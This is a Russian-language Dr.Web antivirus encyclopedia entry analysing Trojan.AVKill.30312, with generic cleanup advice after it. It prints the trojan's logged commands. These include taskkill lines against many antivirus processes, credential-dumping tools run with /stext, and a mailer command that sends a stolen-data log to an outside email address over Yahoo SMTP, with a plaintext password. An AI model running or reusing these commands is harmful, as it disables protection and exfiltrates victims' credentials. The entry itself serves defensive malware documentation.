Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.AVKill.30312
Добавлен в вирусную базу Dr.Web:
2013-04-25
Описание добавлено:
2013-05-01
Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VPTray.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM ccApp.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\68MNCYXSQP.exe' /stext 1.25.COPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\GI6TCD09NS.exe' /stext 1.37.WBPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM MsMpSvc.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM MsMpSvc /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM ccSvcHst.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM McUICnt.exe /F
'%TEMP%\RTYBVCKJ59.exe' /stext 1.80.MAPV
'%TEMP%\7NBZCOPSB8.exe' /stext 1.26.IXPS
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\009OJBCZRJ.exe' /stext 1.35.PSWF
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12LMXIFVX0.exe' -to ne0n.logs@outlook.com -from neon.email_001@yahoo.com -ssl -smtp smtp.mail.yahoo.com -port 465 -sub "ne0n v1.0 Sun 04/21/2013 19:38:04.39 CRNJEUFU" -M "Computer Name: CRNJEUFU - Username: %USERNAME%" -auth -user neon.email_001 -pass ,SQOOGZnGYSf*FR2zZ/UCE)HOVvFL{vH -attach "ne0n_logs"
'<LS_APPDATA>\Xenocode\Sandbox\IE PassView\1.26\2013.03.29T17.03\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\7NBZCOPSB8.exe' /stext 1.26.IXPS
'%TEMP%\12XVLGBG32.exe' /stext 1.42.MSPV
'<LS_APPDATA>\Xenocode\Sandbox\Mail PassView\1.80\2013.04.21T02.34\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\mailpv.exe' /stext 1.80.MAPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\676NXZRKGD.exe' /stext 1.05.AOPV
'<LS_APPDATA>\Xenocode\Sandbox\MessenPass\1.42\2013.03.29T16.54\Virtual\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12XVLGBG32.exe' /stext 1.42.MSPV
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\WScript.exe' "%TEMP%\RUN1234564.vbs"
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@PROFILE@\Local Settings\Temp\12MNBXJJS0.exe' HBZMAQP109.zip
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avgui.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\UBCALO8X0X.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\INSTALL.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Virtual\STUBEXE\8.0.1112\@APPDIR@\ne0n_v1.0 - Copy.Original_Icon.exe'
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\cmd.exe' /c ""%TEMP%\90MZALGFB3.bat" "
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\WScript.exe' "%TEMP%\RUN1234567.vbs"
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avgcfgex.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM avp.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VSSERV.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM msseces.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM AVP /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM bdagent.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM vprot.exe /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM VSSERV /F
'<LS_APPDATA>\Xenocode\Sandbox\Hotstub\1.00\2013.04.21T02.55\Native\STUBEXE\8.0.1112\@SYSTEM@\taskkill.exe' /IM seccenter.exe /F
Завершает или пытается завершить
следующие пользовательские процессы:
ccapp.exe
AVP.EXE
bdagent.exe
Изменения в файловой системе:
Создает следующие файлы:
%TEMP%\RUN1234564.vbs
%TEMP%\UBCALO8X0X.bat
%TEMP%\RTYBVCKJ59
%TEMP%\7NBZCOPSB8
%TEMP%\GI6TCD09NS
%TEMP%\1.37.WBPV
%TEMP%\1.35.PSWF
%TEMP%\ne0n_logs
%TEMP%\1.05.AOPV
%TEMP%\1.25.COPV
%TEMP%\1.80.MAPV
%TEMP%\HBZMAQP109.abcdefg
%TEMP%\RUN1234567.abcdefg
%TEMP%\90MZALGFB3.abcdefg
%TEMP%\12MNBXJJS0.abcdefg
%TEMP%\INSTALL.bat
%TEMP%\676NXZRKGD
%TEMP%\68MNCYXSQP
%TEMP%\12XVLGBG32
%TEMP%\009OJBCZRJ
%TEMP%\12LMXIFVX0
Удаляет следующие файлы:
%TEMP%\1.37.WBPV
%TEMP%\1.25.COPV
%TEMP%\7NBZCOPSB8
%TEMP%\12LMXIFVX0
%TEMP%\1.80.MAPV
%TEMP%\ne0n_logs
%TEMP%\RUN1234564.vbs
%TEMP%\1.05.AOPV
%TEMP%\1.35.PSWF
%TEMP%\12MNBXJJS0.exe
%TEMP%\GI6TCD09NS
%TEMP%\RUN1234567.vbs
%TEMP%\HBZMAQP109.zip
%TEMP%\68MNCYXSQP
%TEMP%\676NXZRKGD
%TEMP%\009OJBCZRJ
%TEMP%\RTYBVCKJ59
%TEMP%\12XVLGBG32
Перемещает следующие файлы:
%TEMP%\68MNCYXSQP.exe в %TEMP%\68MNCYXSQP
%TEMP%\RTYBVCKJ59.exe в %TEMP%\RTYBVCKJ59
%TEMP%\GI6TCD09NS.exe в %TEMP%\GI6TCD09NS
%TEMP%\7NBZCOPSB8 в %TEMP%\7NBZCOPSB8.exe
%TEMP%\12LMXIFVX0 в %TEMP%\12LMXIFVX0.exe
%TEMP%\7NBZCOPSB8.exe в %TEMP%\7NBZCOPSB8
%TEMP%\12LMXIFVX0.exe в %TEMP%\12LMXIFVX0
%TEMP%\009OJBCZRJ.exe в %TEMP%\009OJBCZRJ
%TEMP%\12XVLGBG32.exe в %TEMP%\12XVLGBG32
%TEMP%\676NXZRKGD.exe в %TEMP%\676NXZRKGD
%TEMP%\12MNBXJJS0.abcdefg в %TEMP%\12MNBXJJS0.exe
%TEMP%\GI6TCD09NS в %TEMP%\GI6TCD09NS.exe
%TEMP%\HBZMAQP109.abcdefg в %TEMP%\HBZMAQP109.zip
%TEMP%\90MZALGFB3.abcdefg в %TEMP%\90MZALGFB3.bat
%TEMP%\RUN1234567.abcdefg в %TEMP%\RUN1234567.vbs
%TEMP%\676NXZRKGD в %TEMP%\676NXZRKGD.exe
%TEMP%\009OJBCZRJ в %TEMP%\009OJBCZRJ.exe
%TEMP%\12XVLGBG32 в %TEMP%\12XVLGBG32.exe
%TEMP%\68MNCYXSQP в %TEMP%\68MNCYXSQP.exe
%TEMP%\RTYBVCKJ59 в %TEMP%\RTYBVCKJ59.exe
Сетевая активность:
Подключается к:
UDP:
DNS ASK sm##.#ail.yahoo.com
Другое:
Ищет следующие окна:
ClassName: '' WindowName: ''
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK